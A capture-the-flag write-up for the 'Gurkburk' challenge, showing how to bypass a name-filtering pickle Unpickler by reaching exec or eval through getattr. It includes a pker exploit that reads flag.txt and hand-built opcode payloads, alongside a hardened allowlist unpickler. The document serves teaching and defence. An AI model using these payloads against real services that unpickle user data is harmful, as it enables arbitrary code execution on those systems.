# Gurkburk

## Problem

The flag is located in `./flag.txt`.

## Solution

The application stores notes with Python's `pickle` module: a saved note is a pickle stream, and loading a note unpickles attacker-controlled bytes.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-00cfd7b3e50ba632f7647d37cd7f4cc9e7e1a2b0%2Fb83bd3862fc8415a9a08fa222b4fbd00.png?alt=media)

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-5e20b73fa72c703ac717d174fe484f7bc5e64670%2F06f07bd072064fb4a8827f6db569c53a.png?alt=media)

Normally an object whose `__reduce__()` returns `(os.system, ("cmd",))` would be enough: the pickle then carries a `GLOBAL` opcode for `os.system` followed by a `REDUCE` that calls it during `load()` (see <https://davidhamann.de/2020/04/05/exploiting-python-pickle/>).

Here the application overrides `Unpickler.find_class` in the style of <https://docs.python.org/3.7/library/pickle.html#restricting-globals>: the module string of a `GLOBAL` opcode must be one of `__main__`, `__builtin__` or `copyreg`, and the names `eval` and `exec` are rejected. Note that this check only sees the `(module, name)` strings that `GLOBAL` supplies; it knows nothing about objects obtained later by calling what was loaded.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-2331847cac3d3cb272875a4d86ffdc6bc736bc01%2Fa67175be4b3d4d13a97580a116bf2716.png?alt=media)

Thanks to <https://translate.google.com/translate?hl=en&sl=zh-CN&u=https://xz.aliyun.com/t/7436&prev=search>, I found a way to bypass the restrictions.

The same author published pker, a tool that compiles a small Python-like DSL into pickle opcodes: <https://github.com/EddieIvan01/pker> (I made some slight modifications).

Exploit code:

```python
# pker DSL: GLOBAL(module, name) emits a GLOBAL opcode (the only thing
# find_class inspects); a call emits MARK / TUPLE / REDUCE.
getattr = GLOBAL('__builtin__', 'getattr')
dict = GLOBAL('__builtin__', 'dict')
dict_get = getattr(dict, 'get')
# globals() of the frame that called pickle.loads, i.e. the application module
glo_dic = GLOBAL('__builtin__', 'globals')()
# its __builtins__ entry is the builtins module ...
builtins = dict_get(glo_dic, '__builtins__')
# ... so exec is fetched as an attribute and never passes through find_class
exec = getattr(builtins, 'exec')
exec("print(open('flag.txt', 'r').read())")
return
```

The idea is that the blacklist filters names, not objects. `getattr` is not banned, so once `getattr` and `dict` have been loaded from `__builtin__` we can read any attribute of any object we can reach. `globals()` returns the globals of the frame that called `pickle.loads`, that is the application's own module; its `__builtins__` entry is the `builtins` module, and `getattr(builtins, 'exec')` hands us `exec` without the string `exec` ever reaching `find_class`. One caveat: `__builtins__` is the module object only in `__main__`; in an imported module it is the module's `__dict__`, in which case a second `dict.get` would be needed instead of `getattr`. Once we hold `exec`, the payload executes arbitrary Python.
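To make the two points above concrete (the filter described under the restricting-globals link and the getattr bypass), here is an added, self-contained example that is not the challenge's code or pker's output. The `RestrictedUnpickler` is my reconstruction of the filter from the writeup's description (module allowlist plus an `eval`/`exec` name blacklist); the challenge source is not on the page. The payloads are hand-written protocol 0 opcodes. Instead of the writeup's `globals()['__builtins__']` step I reach the `builtins` module through `getattr.__self__`, which is that module regardless of where `loads` is called from, and I fetch `eval` rather than `exec` so that the unpickled object is a checkable value. A `SafeUnpickler` with an exact `(module, name)` allowlist is shown beside it as the hardened form.

```python
import io
import pickle
from collections import OrderedDict

# Assumed reconstruction of the challenge's filter, based only on the
# writeup's description; not the real challenge source.
ALLOWED_MODULES = {"__main__", "__builtin__", "copyreg"}
BANNED_NAMES = {"eval", "exec"}


class RestrictedUnpickler(pickle.Unpickler):
    """Vulnerable: filters the strings a GLOBAL opcode hands to find_class."""

    def find_class(self, module, name):
        if module not in ALLOWED_MODULES:
            raise pickle.UnpicklingError(f"module {module!r} is forbidden")
        if name in BANNED_NAMES:
            raise pickle.UnpicklingError(f"{module}.{name} is forbidden")
        # For protocol < 3 the base class maps the Python 2 name
        # '__builtin__' onto 'builtins' (fix_imports), so the name resolves.
        return super().find_class(module, name)


# Hardened: exact (module, name) allowlist. getattr, globals, __import__ and
# friends are not on it, so attribute walking has nothing to start from.
SAFE_GLOBALS = {("collections", "OrderedDict")}


class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in SAFE_GLOBALS:
            raise pickle.UnpicklingError(f"{module}.{name} is not allowlisted")
        return super().find_class(module, name)


# --- hand-written protocol 0 opcodes ---------------------------------------
def _global(module, name):
    """GLOBAL: push module.name; this is what find_class gets to see."""
    return b"c" + module.encode() + b"\n" + name.encode() + b"\n"


def _ustr(text):
    """UNICODE: push a str read up to the next newline."""
    if "\n" in text:
        raise ValueError("V opcode payload must not contain a newline")
    return b"V" + text.encode() + b"\n"


def _call(func, *args):
    """func MARK args... TUPLE REDUCE  ->  func(*args) left on the stack."""
    return func + b"(" + b"".join(args) + b"tR"


def direct_payload(expr):
    """Naive: GLOBAL __builtin__.eval then eval(expr). Hits the name check."""
    return _call(_global("__builtin__", "eval"), _ustr(expr)) + b"."


def fetch_builtin(name):
    """Leave builtins.<name> on the stack without <name> ever passing through
    find_class: getattr.__self__ is the builtins module, so two getattr calls
    reach any builtin (the writeup goes via globals()['__builtins__'])."""
    getattr_ = _global("__builtin__", "getattr")
    builtins_mod = _call(getattr_, getattr_, _ustr("__self__"))
    return _call(getattr_, builtins_mod, _ustr(name))


def bypass_payload(expr):
    """eval(expr) through the fetched builtin; the result is the unpickled object."""
    return _call(fetch_builtin("eval"), _ustr(expr)) + b"."


def load_with(unpickler_cls, data):
    """Return ('ok', obj) or ('blocked', reason) for one payload/unpickler pair."""
    try:
        return "ok", unpickler_cls(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "blocked", str(exc)


# Constructed legitimate note, the kind of data the allowlist must still accept.
LEGIT_NOTE = pickle.dumps(OrderedDict(title="groceries", body="milk"))

if __name__ == "__main__":
    print(load_with(RestrictedUnpickler, direct_payload("7 * 6")))  # blocked
    print(load_with(RestrictedUnpickler, bypass_payload("7 * 6")))  # ('ok', 42)
    print(load_with(SafeUnpickler, bypass_payload("7 * 6")))        # blocked
    print(load_with(SafeUnpickler, LEGIT_NOTE)[0])                  # ok
```

The allowlist is defence in depth rather than a fix: anything that unpickles untrusted input is one forgotten entry away from code execution, so notes from users belong in a data-only format such as JSON.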

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-b3e769e45a6f21bc8ddcb1d34dd2258f73e83a3a%2F7b67c03c11e5447f8e7b010512a8ccac.png?alt=media)

Submit the base64-encoded opcodes as a note; loading it runs the payload and prints the flag.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-1ae5501523df86097e1b1bb8d562f159cfaf97e7%2F5cefd07e73384b6493eab4f5c7c5f4a4.png?alt=media)

## References

1. <https://davidhamann.de/2020/04/05/exploiting-python-pickle/>
2. <https://translate.google.com/translate?hl=en&sl=zh-CN&u=https://xz.aliyun.com/t/7436&prev=search>
3. <https://github.com/EddieIvan01/pker>
